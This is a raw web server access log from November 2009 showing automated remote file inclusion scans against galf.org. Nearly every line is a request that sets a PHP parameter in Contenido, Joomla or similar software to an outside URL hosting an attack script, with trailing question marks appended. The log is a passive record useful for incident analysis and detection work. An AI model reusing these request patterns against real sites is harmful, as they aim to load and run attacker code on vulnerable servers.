114.108.177.238 - - [23/Nov/2009:02:21:43 -0800] "GET /logs/access.log%20%20/index.php?redir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:02:21:43 -0800] "GET /logs/index.php?redir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:02:21:48 -0800] "GET /logs/access_090720.log%20%20/index.php?redir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:56 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:56 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:56 -0800] "GET /logs/access.log//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
114.108.177.238 - - [23/Nov/2009:02:21:57 -0800] "GET /logs/access_090720.log%20%20/index.php?redir=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:57 -0800] "GET /logs/access_090601.log//home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:57 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:57 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:58 -0800] "GET /logs/access.log//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:58 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:21:59 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:22:27 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:22:27 -0800] "GET /logs/access_090601.log//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:22:27 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:22:35 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:22:35 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:22:35 -0800] "GET /logs/access_090601.log///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:22:40 -0800] "GET /logs/access_090601.log//home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:22:40 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:22:40 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:22:40 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:22:40 -0800] "GET /logs/access.log///conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:22:41 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "galf.org"
222.237.78.176 - - [23/Nov/2009:02:22:52 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:22:53 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:22:53 -0800] "GET /logs/access_090601.log//home//conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:24:08 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:24:08 -0800] "GET /logs/access_090601.log///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:24:08 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:24:30 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:24:30 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:24:30 -0800] "GET /logs/access_090601.log//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:24:39 -0800] "GET /logs/access_090601.log///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:24:39 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:24:39 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:24:54 -0800] "GET /logs/access_090601.log///conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:24:54 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:24:54 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:24:55 -0800] "GET /logs/access_090601.log//home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:24:55 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:24:56 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:24:59 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:24:59 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:24:59 -0800] "GET /logs/access_090601.log///conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.129.64.89 - - [23/Nov/2009:02:25:08 -0800] "GET /logs/access_090824.log//?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/aisatriani/paket/safe.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.129.64.89 - - [23/Nov/2009:02:25:09 -0800] "GET /logs//?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/aisatriani/paket/safe.txt? HTTP/1.1" 200 4947 "-" "libwww-perl/5.79" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:25:27 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:25:27 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:25:27 -0800] "GET /logs/access_090601.log//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:25:31 -0800] "GET /home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:25:31 -0800] "GET /logs//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:25:31 -0800] "GET /logs/access_090601.log//home//conlib/local.php?cfg[path][contenido]=http://familylink.or.kr/bbs/skin/happycast_gray/images/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:25:35 -0800] "GET /components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:25:35 -0800] "GET /logs/access_090601.log%20%20//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:25:35 -0800] "GET /logs//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:25:39 -0800] "GET /logs/access_090713.log%20%20//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:25:39 -0800] "GET /logs/access_090525.log%20%20//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:25:39 -0800] "GET /logs/access_090608.log%20%20//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:25:39 -0800] "GET /logs/access_090629.log%20%20//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:25:45 -0800] "GET /logs/access_090720.log%20%20//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:25:45 -0800] "GET /logs/access_090921.log%20%20//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:25:45 -0800] "GET /logs/access_090824.log%20%20//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:25:49 -0800] "GET /logs/access_090831.log%20%20//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:25:49 -0800] "GET /logs/access_090907.log%20%20//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:01 -0800] "GET /logs/access_090525.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:26:19 -0800] "GET /logs/access_090601.log///conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:26:19 -0800] "GET /logs///conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:26:19 -0800] "GET //conlib/local.php?cfg[path][contenido]=http://iwebkorea.net/gajung/board/download/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:25 -0800] "GET /logs/access_090427.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:25 -0800] "GET /logs/access_090420.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:39 -0800] "GET /logs/access_090831.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:39 -0800] "GET /logs/access_090629.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:39 -0800] "GET /logs/access_090907.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:39 -0800] "GET /logs/access_090511.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:39 -0800] "GET /logs/access_090608.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:39 -0800] "GET /logs/access_090727.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:39 -0800] "GET /logs/access_090504.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:39 -0800] "GET /logs/access_090622.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:42 -0800] "GET /components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:42 -0800] "GET /logs//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:42 -0800] "GET /logs/access_090601.log%20%20//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:44 -0800] "GET /logs/access_090713.log%20%20//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:44 -0800] "GET /logs/access_090525.log%20%20//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:44 -0800] "GET /logs/access_090629.log%20%20//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:44 -0800] "GET /logs/access_090608.log%20%20//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.187.234.206 - - [23/Nov/2009:02:26:48 -0800] "GET /logs//include/write.php?dir=http://www.mysecl.com/board/editor/id11.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.187.234.206 - - [23/Nov/2009:02:26:48 -0800] "GET /include/write.php?dir=http://www.mysecl.com/board/editor/id11.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.187.234.206 - - [23/Nov/2009:02:26:48 -0800] "GET /logs/access_090309.log%20%20//include/write.php?dir=http://www.mysecl.com/board/editor/id11.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:50 -0800] "GET /logs/access_090720.log%20%20//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:50 -0800] "GET /logs/access_090921.log%20%20//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:50 -0800] "GET /logs/access_090824.log%20%20//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:54 -0800] "GET /logs/access_090907.log%20%20//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:26:54 -0800] "GET /logs/access_090831.log%20%20//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:05 -0800] "GET /logs/access_090413.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:05 -0800] "GET /logs/access_090817.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:05 -0800] "GET /logs/access_090810.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:05 -0800] "GET /logs/access_090330.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:05 -0800] "GET /logs/access_090824.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:07 -0800] "GET /logs/access_090713.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:07 -0800] "GET /logs/access_090720.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:07 -0800] "GET /logs/access_090427.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.71.89 - - [23/Nov/2009:02:27:07 -0800] "GET /logs/access_090420.log//components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
93.187.234.206 - - [23/Nov/2009:02:27:18 -0800] "GET /logs/access_090525.log%20%20//include/write.php?dir=http://www.mysecl.com/board/editor/id11.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.237.78.176 - - [23/Nov/2009:02:27:23 -0800] "GET /logs/access_090601.log///conlib/local.php?cfg[path][contenido]=http://www.hochsauerlandferien.de/nw/data/images/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
